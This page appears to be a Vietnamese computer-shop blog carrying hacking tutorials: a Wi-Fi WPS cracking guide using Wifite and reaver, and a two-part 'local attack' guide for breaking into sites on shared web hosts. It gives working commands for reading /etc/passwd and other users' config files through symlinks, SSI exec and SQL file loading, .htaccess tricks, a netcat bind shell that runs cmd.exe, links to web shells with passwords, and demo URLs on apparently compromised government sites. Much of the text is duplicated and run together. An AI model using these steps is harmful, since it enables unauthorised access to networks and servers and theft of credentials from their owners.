CÔNG TY TNHH TIN HỌC HOÀNG MINH PHÁT !
ĐỒNG HÀNH CÙNG THỜI ĐẠI SỐ !
TẬN TÂM ! UY TÍN !CHUYÊN NGHIỆP!
Liên hệ :
Địa chỉ :50b tổ 2,kp 10, Tân Phong, Biên Hòa, Đồng Nai
Yahoo: Hoangminhcomputer88
Phone: 01252809349 HOẶC 0945304439 !
Tại : Biên Hòa - Đồng Nai !
Hiển thị các bài đăng có nhãn Hacking & Cracking. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Hacking & Cracking. Hiển thị tất cả bài đăng
Thứ Năm, 31 tháng 7, 2014
Cách hack pass wifi - Bẻ khoá Wifi WPA2 WEP
Có thể crack WEP, WPA và cả WPA2 (Cái này cần thời gian và sự may mắn)
Mình sử dụng Backtrack 5 r2 và đã thành công với WPA2 có sử dụng WPS (thời gian từ 4h--> 10 tiếng) (riêng mình thực tế là 8 tiếng, bạn mình thì lại may mắn hơn,hack wifi chỗ khác chỉ mất 4 tiếng )
Cơ chế crack đối với WPS là dùng brute force đoán mã PIN của router từ đó lấy password wifi. với mã PIN tìm được có thể login vào router và chỉnh sửa cấu hình trong đó.
Chương trình mình sử dụng cùng với Backtrack là Wifite (sử dụng ngôn ngữ python).
Hiện tại đã có Wifite v2:
Mình sử dụng Backtrack 5 r2 và đã thành công với WPA2 có sử dụng WPS (thời gian từ 4h--> 10 tiếng) (riêng mình thực tế là 8 tiếng, bạn mình thì lại may mắn hơn,hack wifi chỗ khác chỉ mất 4 tiếng )
Cơ chế crack đối với WPS là dùng brute force đoán mã PIN của router từ đó lấy password wifi. với mã PIN tìm được có thể login vào router và chỉnh sửa cấu hình trong đó.
Chương trình mình sử dụng cùng với Backtrack là Wifite (sử dụng ngôn ngữ python).
Hiện tại đã có Wifite v2:
- support for cracking WPS-encrypted networks (via reaver)
- 2 new WEP attacks
- more accurate WPA handshake capture
- various bug fixes
Các bạn có thể lên trang chủ để download:
Wifite là mã nguồn mở, bạn có thể xem file wifite.py và chỉnh sửa tùy thích. Wifite.py được thiết kế dành cho linux, sử dụng python, không chạy trên windows. Những cái này trong Backtrack 5r2 đã có cả rồi nhé.
Đầu tiên các bạn sẽ ở thư mục gốc (/). Các bạn nên tạo một thư mục riêng để dễ quản lý. Câu lệnh như sau: mkdir tenban
Sau đó các bạn cho con trỏ đến thư mục vừa tạo bằng lệnh cd /tenban
Download wifite.py về nhé wget -O wifite.py
Chmod quyền để thực thi file vừa tải về chmod +x wifite.py
Xong giờ chạy lệnh python wifite.py hoặc ./wifite.py
Nó sẽ tự động chuyển card mạng sang chế độ monitor và quét các AP đang có. Sau khi thấy mục tiêu cần crack các bạn nhấn Ctrl + C. Nó sẽ hỏi tiếp bạn muốn crack cái AP nào, bạn xem trên màn hình và gõ số tương ứng và chờ thôi.
Chương trình này tự động nhé, các bạn không cần phải gõ lệnh airmon-ng hay airodump-ng gì nữa hết.
Xem thêm video hướng dẫn:
Một vài hình ảnh:
WEP:
WPS:
Đây là hình ảnh file cracked.txt sau khi crack thành công.

Vài lời nói thêm: muốn hack dạng mã hóa WPA , WPA2 thì wifi đó phải đang hỗ trợ và bật chế độ WPS, muốn biết có thể test ở linux = cách dùng phần mềm wifite.py mình đã nêu ở trên, và 1 cách kiểm tra thông qua windows mà tỉ lệ chắc chắn thì chưa chắc lắm là khi bạn click connect vào wifi sẽ có dòng Getting information.... rồi dưới khung yêu cầu đánh pass sẽ có dòng You can also connect..... nhưng khi wifi có bật chế độ WPS, tỉ lệ hack thành công theo mình nghĩ là 30% vì còn phải may mắn, may mắn ở đây ko phải là như dạng từ điển là ngồi dò pass và mong trúng 1 cái,
1) mà vấn đề là có thể wifi đó modem đã thuộc dạng đã fix đc lỗi WPS, nên khi các bạn crack theo dạng dò Pin WPS sẽ bị lỗi Limit tới AP
2) crack đc pin modem nhưng khi hiện ra pass thì là 1 dạng pass mã hóa
nên vì vậy để crack 1 wifi wpa wpa2 thì nên ở 1 phòng thoáng, nằm trên lầu có cửa sổ, như bên mình, dù hóc hẻm, cũng đc 15 cái wifi,nhưng có enable WPS lên thì chỉ có 4 ,5 cái và hack đc chỉ có 2 cái
P/s: còn các bạn hack đc pin lấy đc pass nhưng sau này chủ AP lại đổi pass khác thì hack bằng reaver là có mã pin lấy đc pass ngay.
câu lệnh: reaver -i mon0 -b BSSID --pin=xxxxxxxx -vv (với xxxxxxxx là 8 số mã pin bạn đã hack đc)
hoạc có thể xem thêm với reaver --help
bro nào bik rồi thì đừng chém e tội em, mọi thắc mắc mọi người cứ để lại trong topic mình sẽ reply sớm nhất có thể
và nhắc lại là WPA, hoặc WPA2 có hỗ trợ chế độ WPS thì mới có thể hack đc nhé mọi người
còn WPS là gì? thì nôm na là chức năng kết nối nhanh không cần pass vd: 1 cái đt có hỗ trợ WPS, cái wifi có hỗ trợ, đt bật wps lên, cái AP nhấn vào nút WPS thì đt sẽ kết nối thẳng vào Wifi mà ko cần pass, nôm na là thế, mấy cái AP tặng khuyến mãi mạng 3mb, 4mb thì ít khi có, nhưng những modem xịn hơn tí đa số điều hỗ trợ WPS
mọi người yêu cầu nên tớ sẽ viết hướng dẫn chi tiết hơn nhá.....
các công cụ cần trước khi làm: unetbootin + backtrack 5 iso + 1 usb ~4GB
B1: unetbootin và backtrack 5 R3
điền your name, mail và country bất kỳ sẽ ra được khung sau:
chọn như hình và click to download để down file ISO backtrack về
B2: mở file unetbootin lên và phần diskimage chọn file ISO backtrack khi nãy đã down về và nhấn ok
B3: chờ chạy đến 100% và reboot, thế là bạn đã có 1 usb boot Backtrack 5.
B4: Boot usb vừa làm lên: tùy theo loại máy tính, có thể F12, hoặc F8 để chọn boot USB, hoặc có thể F2 để vào BIOS phần menu boot để bật boot với usb lên(bạn nào chưa rành chỗ này chắc phải search google từ khóa " thiết lập bios để boot usb"
B5: sau khi boot usb lên sẽ được như hình :
chọn dòng "backtrack text - default boot text mode" để vào backtrack
B6: ra khung này bạn chỉ cần gõ startx để vào backtrack
B7: sau khi startx sẽ vào được backtrack như sau: nhấn vào biểu tượng terminal để ra khung như sau
B8: gõ vào như trên để download wifite về linux (nếu ko có mạng thì có thể lấy link
ở windows download bằng IDM về trước rồi copy bỏ 1 usb khác bỏ vào để chạy 
nếu down trực tiếp trong linux thì sẽ có kết quả như sau

sau đó gõ lệnh như trên để cho phép thực thi file wifite

B9: chạy lệnh thực thi phần mềm wifite như hình

B10: sau khi chạy lệnh ./wifite.py chờ nó load 5, 10s rồi Ctrl+C để nó dừng lại được như sau

B11: chọn số thứ tự cái wifi cần làm (lưu ý wifi phải có dòng wps bên cạnh mới có thể crack được), xong ngồi chờ kết quả thôi @@

Bài viết: Cách hack pass wifi - Bẻ khoá Wifi WPA2 WEP
Nguồn Zing Blog
Mã:
http://code.google.com/p/wifite/ hoặc link trực tiếp https://wifite.googlecode.com/files/wifite-2.0r85.tar.gz
Hướng dẫn hack pass wifi:
Đầu tiên các bạn sẽ ở thư mục gốc (/). Các bạn nên tạo một thư mục riêng để dễ quản lý. Câu lệnh như sau: mkdir tenban
Sau đó các bạn cho con trỏ đến thư mục vừa tạo bằng lệnh cd /tenban
Download wifite.py về nhé wget -O wifite.py
Mã:
http://wifite.googlecode.com/svn/trunk/wifite.py
Xong giờ chạy lệnh python wifite.py hoặc ./wifite.py
Nó sẽ tự động chuyển card mạng sang chế độ monitor và quét các AP đang có. Sau khi thấy mục tiêu cần crack các bạn nhấn Ctrl + C. Nó sẽ hỏi tiếp bạn muốn crack cái AP nào, bạn xem trên màn hình và gõ số tương ứng và chờ thôi.
Chương trình này tự động nhé, các bạn không cần phải gõ lệnh airmon-ng hay airodump-ng gì nữa hết.
Xem thêm video hướng dẫn:
Một vài hình ảnh:
WEP:

WPS:

Đây là hình ảnh file cracked.txt sau khi crack thành công.

Vài lời nói thêm: muốn hack dạng mã hóa WPA , WPA2 thì wifi đó phải đang hỗ trợ và bật chế độ WPS, muốn biết có thể test ở linux = cách dùng phần mềm wifite.py mình đã nêu ở trên, và 1 cách kiểm tra thông qua windows mà tỉ lệ chắc chắn thì chưa chắc lắm là khi bạn click connect vào wifi sẽ có dòng Getting information.... rồi dưới khung yêu cầu đánh pass sẽ có dòng You can also connect..... nhưng khi wifi có bật chế độ WPS, tỉ lệ hack thành công theo mình nghĩ là 30% vì còn phải may mắn, may mắn ở đây ko phải là như dạng từ điển là ngồi dò pass và mong trúng 1 cái,
1) mà vấn đề là có thể wifi đó modem đã thuộc dạng đã fix đc lỗi WPS, nên khi các bạn crack theo dạng dò Pin WPS sẽ bị lỗi Limit tới AP
2) crack đc pin modem nhưng khi hiện ra pass thì là 1 dạng pass mã hóa
nên vì vậy để crack 1 wifi wpa wpa2 thì nên ở 1 phòng thoáng, nằm trên lầu có cửa sổ, như bên mình, dù hóc hẻm, cũng đc 15 cái wifi,nhưng có enable WPS lên thì chỉ có 4 ,5 cái và hack đc chỉ có 2 cái
P/s: còn các bạn hack đc pin lấy đc pass nhưng sau này chủ AP lại đổi pass khác thì hack bằng reaver là có mã pin lấy đc pass ngay.
câu lệnh: reaver -i mon0 -b BSSID --pin=xxxxxxxx -vv (với xxxxxxxx là 8 số mã pin bạn đã hack đc)
hoạc có thể xem thêm với reaver --help
bro nào bik rồi thì đừng chém e tội em, mọi thắc mắc mọi người cứ để lại trong topic mình sẽ reply sớm nhất có thể
và nhắc lại là WPA, hoặc WPA2 có hỗ trợ chế độ WPS thì mới có thể hack đc nhé mọi người
còn WPS là gì? thì nôm na là chức năng kết nối nhanh không cần pass vd: 1 cái đt có hỗ trợ WPS, cái wifi có hỗ trợ, đt bật wps lên, cái AP nhấn vào nút WPS thì đt sẽ kết nối thẳng vào Wifi mà ko cần pass, nôm na là thế, mấy cái AP tặng khuyến mãi mạng 3mb, 4mb thì ít khi có, nhưng những modem xịn hơn tí đa số điều hỗ trợ WPS
mọi người yêu cầu nên tớ sẽ viết hướng dẫn chi tiết hơn nhá.....
các công cụ cần trước khi làm: unetbootin + backtrack 5 iso + 1 usb ~4GB
B1: unetbootin và backtrack 5 R3
Mã:
http://www.backtrack-linux.org/downloads/

chọn như hình và click to download để down file ISO backtrack về
B2: mở file unetbootin lên và phần diskimage chọn file ISO backtrack khi nãy đã down về và nhấn ok

B3: chờ chạy đến 100% và reboot, thế là bạn đã có 1 usb boot Backtrack 5.

B4: Boot usb vừa làm lên: tùy theo loại máy tính, có thể F12, hoặc F8 để chọn boot USB, hoặc có thể F2 để vào BIOS phần menu boot để bật boot với usb lên(bạn nào chưa rành chỗ này chắc phải search google từ khóa " thiết lập bios để boot usb"
B5: sau khi boot usb lên sẽ được như hình :

chọn dòng "backtrack text - default boot text mode" để vào backtrack
B6: ra khung này bạn chỉ cần gõ startx để vào backtrack

B7: sau khi startx sẽ vào được backtrack như sau: nhấn vào biểu tượng terminal để ra khung như sau

B8: gõ vào như trên để download wifite về linux (nếu ko có mạng thì có thể lấy link
Mã:
http://wifite.googlecode.com/svn/trunk/wifite.py


nếu down trực tiếp trong linux thì sẽ có kết quả như sau

sau đó gõ lệnh như trên để cho phép thực thi file wifite

B9: chạy lệnh thực thi phần mềm wifite như hình

B10: sau khi chạy lệnh ./wifite.py chờ nó load 5, 10s rồi Ctrl+C để nó dừng lại được như sau

B11: chọn số thứ tự cái wifi cần làm (lưu ý wifi phải có dòng wps bên cạnh mới có thể crack được), xong ngồi chờ kết quả thôi @@

Bài viết: Cách hack pass wifi - Bẻ khoá Wifi WPA2 WEP
Nguồn Zing Blog
Thứ Hai, 30 tháng 9, 2013
Tổng Hợp Các Phương Pháp Local Attack Thường Dùng(phan 2)
![[IMG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhztUR0rdgrNXHl58KXdDy__543lW2LonnFOVaL7eVfTT1V31kZYiXbIGf8Zo9jQ_VjsYEBAfKm3oHRAkIdrxUibj0DOGPFHL-oX0Vz8XDGb4VkeI76LjOxqeOQUF458UJgPHkGWxPX_eQp/s640/2.png)
- Vào link shell http://www.vksbinhphuoc.gov.vn/soleil/tmp/config.sa
- Coppy toàn bộ thông tin user có được từ câu lệnh: cat /etc/passwd vào khung như hình ảnh dưới đây rồi ấn “get config”
![[IMG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheVZZw2qJj_WUo19pUV5XVLuCSWR30nkA93Q2kZDaPesNIpHCdnXnH8g03Mwh_QTISKWQMhiQgdPaJZIgG3jVokgMo0VdQfiLOpE5lK5KiG_W9vXEDge_rCTo_bL7k4Mf3D4dgdKLi9SfB/s640/3.png)
![[IMG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLrQa64zEKEgxZGQnsz_bBY2VibCujzeGLkea1B1aUc0D4OFx1aGECcDdZrKPUnC5W6MsQnk2vetbllfvvdP9MnRdhyphenhyphenNP5Hj9g6y97EPsQL_i_axPQCn06scetAI4YbRzpfY1nX_QoxHFV/s640/4.png)
+ Là 1 công cụ cực kỳ thuận tiện, giảm bớt thời gian và công sức khi local attack
+ Chỉ sử dụng đối với các server cho chạy shell cgi và cho quyền symlink
+ Không bypass được, chỉ symlink đối với các site chưa chmod và có path dẫn đến file config là mặc định.
6- Symbolink Root:
- Download file r00t.tar.gz về và upload lên host:
http://www.mediafire.com/?21kycoh4g5s4ojo ( pass download: soleil_vhb, pass dải nén: ceh.vn )
- Sau đó giải nén file root.tar.gz, sử dụng lệnh sau:
Tar –zxvf r00t.tar.gz
- Up file .htacess cùng thư mục với file r00t:
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
- Nếu không sủ dụng file r00t.tar.gz đó, có thể thực hiện sym root ngay trên shellDirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
Demo:
http://tnmthatinh.gov.vn/soleil/r00t/
Và đây là cấu trúc của trường http://cdhh.edu.vn/
http://tnmthatinh.gov.vn/soleil/r00t/home/cdhh/public_html/
7- Backconnet:
Có thể hiểu đơn giản là kết nối bằng cổng sau, nghĩa là sử dụng shell backconnet và tool netcat (nc.exe) để mở sẵn 1 cổng trên server, sau đó từ máy tính của attacker kết nối với server qua cổng đã được mở sẵn đó. Mọi câu lệnh thực thi đối với server có thể thực hiện trên máy tính của attacker qua command line.
Đồ nghề cần thiết:
- Tool netcat (nc.exe)
http://www.mediafire.com/?npsob8c7dd9nr40
- Shell back connect đối với asp:
http://www.mediafire.com/?etciiuskzvyhjcw
Chú ý, trong shell có 1 đoạn code như: "G:\domains\tvled.vn\wwwroot\austdoor\design\nc.exe -l -p 1234 -e cmd.exe -d"
Lúc up shell lên cần edit lại “G:\domains\tvled.vn\wwwroot\austdoor\design\” thành path của server dẫn tới file nc.exe.
- Shell backconnet đối với php
http://www.mediafire.com/?8o1sj35cs51lsiw
( Pass unlock soleil_vhb; Pass dải nén: ceh.vn )
- Download tool nc.exe rồi đặt trong ổ C chẳng hạn, sau đó mở cửa sổ command line và sử dụng netcat để mở cổng trên local host kết nối với server đã mở sẵn cổng
- Cú pháp: + chế độ kết nối : nc [-tùy_chọn] tên_máy cổng1[-cổng2]
+ chế độ lắng nghe: nc -l -p cổng [-tùy_chọn] [tên_máy] [cổng]
Một số câu lệnh có thể sử dụng:
nc -nvv -l -p 80
nc -lvvnp 3333
nc -nvv -l -p 12345
nc 127.0.0.1 7777
nc -vv -l -p 7777
nc -vlp 443
+ -l: đặt netcat vào chế độ lắng nghe để chề kết nối đếnnc -lvvnp 3333
nc -nvv -l -p 12345
nc 127.0.0.1 7777
nc -vv -l -p 7777
nc -vlp 443
+ -n: Chỉ dùng ip ở dang số, ví dụ: 123.30.2.42, netcat sẽ ko xét đến DNS.
+ -p: Chỉ định cổng cần lắng nghe hay kết nối
+ -v: Hiện thi các thông tin về kết nối hiện tại. –vv sẽ hiện thị thông tin chi tiết hơn nữa.
- Lưu ý là cần coppy nc.exe vào 1 vị trí nào trong máy rồi sử dụng command đến thư mục chứa nc.exe trước khi thực hiện các câu lệnh liên quan đến netcat
- Sauk hi đã backconnect thành công thì tiến hành local đơn giản chỉ bằng 1 câu lệnh coppy shell từ site đã up được shell tới site victim.
8- Via SQL
- Login vào database và tạo 1 table để load các thông tin bằng cách sử dụng querry sau
create table soleil ( ducdung08clc varchar (1024));
- Query load các thông tin vào table table vừa được tạo:
load data local infile '/etc/passwd' into table soleil
Có thể thay câu lệnh “/etc/passwd” bằng path dẫn đến file config.
- Query hiện thị các thông tin được load vào table soleil:
select * from soleil
- Phương pháp này được gọi là Via SQL, chủ yếu sử dụng khi server không cho chạy run command và có thể bypass đối với 1 số server.
1 số lưu ý:
- Đối với 1 số server Safe_mod: ON, thì shel không có chức năng run command để thực thi các câu lệnh, vậy làm sao có thể local được. Giải pháp được nghĩ đến là sử dụng shell cgi:
![[IMG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEierL0SV0qFG_Q3n3vg6md96_KjHW0H58leN7WFn-EXvGSu5dbP_JiREJyAiNAGRLYwAmpRE9ANZe2D2HlOmZqOPyVP4RrhHuwZBeCD6B4XGO7_ImcgsBfnexPlDUf-btock_zN1z8l6xvK/s640/4.png)
+ Soleil.pin
http://www.mediafire.com/?4k94v1i0shmr46c
Cách sử dụng:
- Up shell soleil.pin và chmod nó về 755
- Up hoặc tạo file .htaccess trong thư mục chứa shell có nội dung:
## START ##
Options +ExecCGI
AddHandler cgi-script cgi pl cgi gmc pin jpg
RewriteEngine on
RewriteRule (.*)\.mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack
## milw0rmvn exploit ##
Hoặc:
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .cin
AddHandler cgi-script .pin
AddHandler cgi-script .pin
Options +ExecCGI
AddHandler cgi-script cgi pl cgi gmc pin jpg
RewriteEngine on
RewriteRule (.*)\.mil$ $1.cgi
Options +FollowSymLinks
DirectoryIndex cmd.html
Options +Indexes
RemoveHandler .hack
AddType text/plain .hack
## milw0rmvn exploit ##
Hoặc:
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .cin
AddHandler cgi-script .pin
AddHandler cgi-script .pin
http://www.mediafire.com/?t9cavs1n0ipthq1
shell telnet.pl có chức năng hoàn toàn tương tự với con shell soleil.pin. Tuy nhiên cách thức sử dụng nó thì đơn giản hơn nhiều vì không phải sử dụng đến file .htaccess mà chỉ cần chmod nó về 755 là chạy được.
![[IMG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbcjIaNB3Gx5v6lGgmUe8i1goLAMim0-blTMQZJ9m2T4TsScMyeG24vjUzSc7uONhCzY-HolY8hPZaWscqvR9SoKzjIGD6m42R5mIHZ-Tu4lBt24r7ckCqcGeVuF0tX2OBOnutMSUHQ9kk/s640/5.png)
( Pass unlock: soleil_vhb, pass dải nén nếu có : ceh.vn )
- * Đối với các server không có chức năng run command và cũng không cho chạy shell cgi thì có thể sử dụng các shell sau để bypass đơn giản đối với 1 số server.
+ fakesymlink.php
http://www.mediafire.com/?fc9kencnilx0rm4 ( 5.2.12 -> 5.3.1
http://www.mediafire.com/?kmid8rahl5wjh74 ( version 5.3 -> 5.4 )
+ 529bypass.php
http://www.mediafire.com/?cls0e5k873w83ef
+ Bypassnull.php
http://www.mediafire.com/?1x0zxmig5ctwezr
+ Hoặc sử dụng safe mode bypass
http://www.mediafire.com/download.php?38d13jgqw132db2
+ Sử dụng các chức năng bypass trên con shell r57vip này ( nên convert domain sang dạng ip)
http://www.mediafire.com/?sqjs5du3srlifqt
+ Hoặc sử dụng via sqli
v.v….
(Tất cả các shell download trên đều có pass unlock: vhb_soleil và pass dải nén nếu có: ceh.vn)
Trong bài tut trên soleil đã giới các phương pháp local attack cơ bản và các dạng bypass cơ bản nhất có thể sử dụng. Trong bài tiếp theo soleil sẽ đề cập đến các dạng bypass nâng cao đối với 1 số server khó, các thủ thuật vượt chmod qua 400 permission, chiếm quyền điều khiển root (get root) và các kỹ thuật up shell đối với 1 số mã nguồn mở như: joomla, worpress, nukeviet, vbulletin, drupal……
Tổng Hợp Các Phương Pháp Local Attack Thường Dùng(phan 1)
* Nhắc lại trình tự các bước Local Attack
1- View danh sách các user trong server
2- Tìm file config.php
3- Get thông tin login vào database
4- Crack hoặc change pass admin
5- Login vào quyên quản trị và upshell
1- View danh sách các user trên server
Muốn local được 1 site nào đó trên server thì trướ tiên cần phải xác định site đó có user là gì, source code là gì từ đó tìm cách đọc file config.php của user đó
- Một số câu lệnh để get user:
Lệnh phổ biến nhất:
Cat /etc/passwd
Tuy nhiên một số server cấm lệnh cat, có thể sử dụng các lệnh sau một cách linh hoạt
Less /etc/passwd
./cat/etc/passwd
More /etc/passwd
Ngoài ra có thể sử dụng chức năng get user
trên shell byg.php, c99.php hay bypass ở r57.php, soleil.pin, telnet.pl
hoặc các shell sau:./cat/etc/passwd
More /etc/passwd
http://www.mediafire.com/?gic70c6ce441333
http://www.mediafire.com/?hi4gnmu3kpxn095 ( đk: chmod 755)
http://www.mediafire.com/?2rk42hiv9b4ii3f
Pass download: soleil_vhb
Pass dải nén: ceh.vn
- Câu lênh get user & domain
Cat /etc/virtual/domainowners ( Chỉ dùng đối với direct admin )
2- Tìm file path file config.php
Đối với các mã nguồn mở thì path file config được mặc định như sau:
Lưu ý: “path” chính là path từ server dẫn tới site, ví dụ đối với server linux, path là: /home/user/public_html
- Vbulletin:
path/includes/config.php
- Mybb:
path/inc/config.php
- Joomla:
path/configuration.php
- Word-Press:
path/wp-config.php
- Ibp:
path/conf_global.php
- Php-fusion:
path/config.php
- Smf:
Path/Settings.php
- Nuke:
path/config.php
- Xoops:
path/mainfile.php
- Zen Cart
Path/includes/configure.php
- path/setidio:
path/datas/config.php
- Datalife Engine:
path/engine/data/config.php
- Phpbb:
Path/config.php
- Wordpress:
path/wp-config.php
- Seditio:
path/datas/config.php
- Drupal:
path/sites/default/settings.php
- Discuz path/includes/config.php
- Mybb:
path/inc/config.php
- Joomla:
path/configuration.php
- Word-Press:
path/wp-config.php
- Ibp:
path/conf_global.php
- Php-fusion:
path/config.php
- Smf:
Path/Settings.php
- Nuke:
path/config.php
- Xoops:
path/mainfile.php
- Zen Cart
Path/includes/configure.php
- path/setidio:
path/datas/config.php
- Datalife Engine:
path/engine/data/config.php
- Phpbb:
Path/config.php
- Wordpress:
path/wp-config.php
- Seditio:
path/datas/config.php
- Drupal:
path/sites/default/settings.php
path/config/config_ucenter.php
- Bo-Blog
path/data/config.php
- Đây là path mặc định đối với các mã nguồn mở, còn đối với site tự code thì thông thường path vẫn đặt hay ngay sau thư mục public_html ( path/config.php ).
- Đối với các quản trị viên chú ý đến tính năng bảo mật, phòng tránh local attack thì họ thường dấu kỹ và thay đổi path dẫn đến file config, trong trường hợp này cần phải dò path bắt đầu từ file index đi vào. Soleil sẽ lấy ví dụ dò path file config đối với vbulletin chẳng hạn:
Forum.php -> global.php ->
includes/class_bootstrap -> includes/init.php ->
includes/class_core.php -> includes/config.php
( Để tìm
kiếm path trong source, search theo từ khóa: “cwd”, ta sẽ thấy đoạn code
tương tự như: “require_once(CWD . '/includes/init.php');” - Đây là
path mặc định dẫn tới file init.php))……3- Get thông tin file config
Phần này chính là phần trọng tâm nhất trong bộ tut local attack. Trong phần này soleil sẽ giới thiệu đầy đủ các kỹ thuật cơ bản để local attack.
3.1- Trước hết ta cần tìm hiểu qua về các câu lệnh cơ bản trong linux ứng dụng cho local attck:
- Ls , dir : Liệt kê tên các file bên trong thư mục
ls -al, ls -lia: Liệt kê tên và thuộc tính các file bên trong thư mục
Ls -lia /home/vhbgroup/public_html/@4rum/includes.config.php
- Cat, ./cat, less, more, tail : View nôi dung bên trong các file:
Cat /home/vhbgroup/public_html/@4rum/includes/config.php
- Ln : Lệnh symbolic link:
Ln -s /home/vhbgroup/public_html/@4rum/includes/config.php soleil.ini
- Cd: Chuyển đổi thư mục
Ví dụ muốn chuyển tới thư mục soleil”
Cd /home/vhbgroup/public_html/@4rum/includes/soleil
cd ~ : Tới thư mục home dictionary
cd -: Quay lại thư mục vừa làm việc
cd ..: Tới thư mục kề bên ngoài thư mục đang làm việc
- Chmod: Phân quyền cho các file hoặc thư mục:cd ~ : Tới thư mục home dictionary
cd -: Quay lại thư mục vừa làm việc
cd ..: Tới thư mục kề bên ngoài thư mục đang làm việc
Chmod 400 config.php ( đang làm việc trong thư mục includes chứa file config.php )
- Mkdir: tạo thư mục:Ví du muốn tạo thư mục soleil trong thư mục includes:
Mkdir /home/vhbgroup/public_html/@4rum/includes/soleil
- Touch : Tạo file:
touch /home/vhbgroup/public_html/@4rum/includes/soleil.php
- Tar, zip: Lệnh nén và giải nén: thường sử dụng trong symlink root
Tar –zcvf ducdung08clc.tar.gz soleil ( Nén thư mục soleil thành file ducdung08clc.tar.gz)
Tar –zxvf ducdung08clc.tar.gz ( giải nén file ducdung08clc.tar.gz)
Tar –zxvf ducdung08clc.tar.gz ( giải nén file ducdung08clc.tar.gz)
Zip –r -9 ducdung08clc.zip soleil ( Nén thư mục soleil thành file ducdung08clc.zip)
Zip -p ducdung08clc.zip ( Giải nén file ducdung.tar.gz)
…………Zip -p ducdung08clc.zip ( Giải nén file ducdung.tar.gz)
3.2-Phần tiếp theo Soleil sẽ trình bày 1 số kỹ thuật dùng để lấy thông tin file config.php
1- Sử dụng các lệnh cat, dir để xem tên thư mục, tệp tin và đọc nội dung tệp tin.
Ví dụ:
dir /home/vhbgroup/public_html/includes
cat /home/vhbgroup/public_html/includes/config.php
Nhưng hiện nay phần lớn các server đều không cho phép thực thi những hàm này nên ứng dụng phương pháp này không mấy khả thicat /home/vhbgroup/public_html/includes/config.php
2- Sử dụng Symbolic link – Gọi tắt là symlink
Symbolic link là kỹ thuật cơ bản và gần như là quan trọng mà phần lớn các attaker nghĩ đến đầu tiên trước khi thực hiện công việc local attack.
Ln -s /home/vhbgroup/public_html/@4rum/includes/config.php soleil.ini
Có thể hiểu đơn giản là tạo 1 file soleil.ini trên host có nội dung giống file config.php của user vhbgroup trên server có path /home/vhbgroup/public_html/@4rum/includes/config.php
Có thể thay soleil.ini bằng .txt nhưng do thói quen soleil vẫn hay sử dụng .ini hơn bởi vì đối với 1 số server bị lỗi nó có thể bypass permissions 400.
3- Sử dụng symlink kết hợp với ssi:
Đối với 1 sô server khi symbolick link bình thường xuất hiên 403 forbinden – không cho phép đọc file đã được symlink thì giải pháp được nghĩ đến đó là kết hợp với ssi.
- Tạo 1 file ducdung08clc.shtml với nội dung như sau:
<!--#include virtual="soleil.ini"-->
Trong đó file soleil.ini là file đã được symbolic link trên server.Bây giờ view source của file ducdung08clc.shtml ta sẽ thấy đc nội dung file soleil.ini đã symbolic link.
4- Chạy lệnh bằng file .shtml
- Tuy nhiên có 1 số server cả 2 cách đó đều không áp dụng được nhưng nó lại cho chạy lệnh bằng file .shtml
<!--#exec cmd="cat /etc/passwd"-->
<!--#exec cmd="tail -n 10000 /var/log/httpd/domains/vhbgroup.net.error.log"-->
Lưu ý: + lệnh tail cũng giống như lệnh cat nhưng nó dùng để xem nhưng dòng cuối cùng của file trên server.+ /var/log/httpd/domains/vhbgroup.net.error.log là path dẫn đến file error.log của direct admin
+ Còn path dẫn đến file error.log của cpanel là: /usr/local/apache/logs/error_log ….., tùy vào bộ cài host mà path dẫn đến file error.log khác nhau.
5- Get all config toàn server
- Đâu tiên download shell get all config ( w.php) về rồi up lên server.
http://www.mediafire.com/?hi4gnmu3kpxn095 ( pass unlock: soleil_vhb )
![[IMG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg25NXa_zd7-jFfQ6j6mBZ0KC0oqMR3ZZ06Y0V1BrJ7r5AVfs3TBvgozzsDtzfM2XU0bvNu87y_8DK90NnfPCEad30OfIexnVOlYMHHVYpVOotwnESmvWbMQhLHKpr0bUAGe9ltDZ5-HtCH/s640/1.png)
- Vào link của thư mục tmp sẽ có 1 số shell với các chức năng sau:
+ dz.sa : Đây là shell cgi, sử dụng nó để get các user trên server bằng cách thực thi câu lệnh: cat /etc/passwd, more /etc/passwd ( Pass login là: dz ).
+ user.sa : Shell này dung để xem danh sách các user và domain trên server.
+ config.sa : Shell này có nhiệm vụ thực thi get all config bằng phương pháp symlink
Đăng ký:
Bài đăng (Atom)